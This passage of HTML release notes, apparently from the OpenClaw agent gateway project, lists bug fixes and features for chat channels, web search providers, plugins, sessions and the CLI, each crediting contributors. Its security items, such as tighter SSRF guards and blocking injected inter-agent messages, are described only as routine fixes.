<li>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</li>
<li>Web search/SearXNG/Firecrawl/Kimi: show the SearXNG JSON API <code>search.formats</code> prerequisite, pass through <code>img_src</code> image URLs, fail explicitly when Kimi returns ungrounded answers, keep public provider requests on strict SSRF guards, reject private/loopback/metadata/non-HTTP(S) hosted Firecrawl scrape targets, and allow explicit self-hosted private Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</li>
<li>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</li>
<li>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</li>
<li>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</li>
<li>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</li>
<li>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Web search/Exa/MiniMax: accept Exa <code>webSearch.baseUrl</code> overrides with endpoint-partitioned caches, include MiniMax Search in setup, and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</li>
<li>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</li>
<li>Web search/Providers MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials and derive Coding Plan usage polling from the configured MiniMax base URL, so OAuth-authorized and global setups use the right endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</li>
<li>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</li>
<li>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</li>
<li>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</li>
<li>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</li>
<li>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</li>
<li>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</li>
<li>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</li>
<li>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</li>
<li>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</li>
<li>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</li>
<li>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</li>
<li>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</li>
<li>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</li>
<li>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
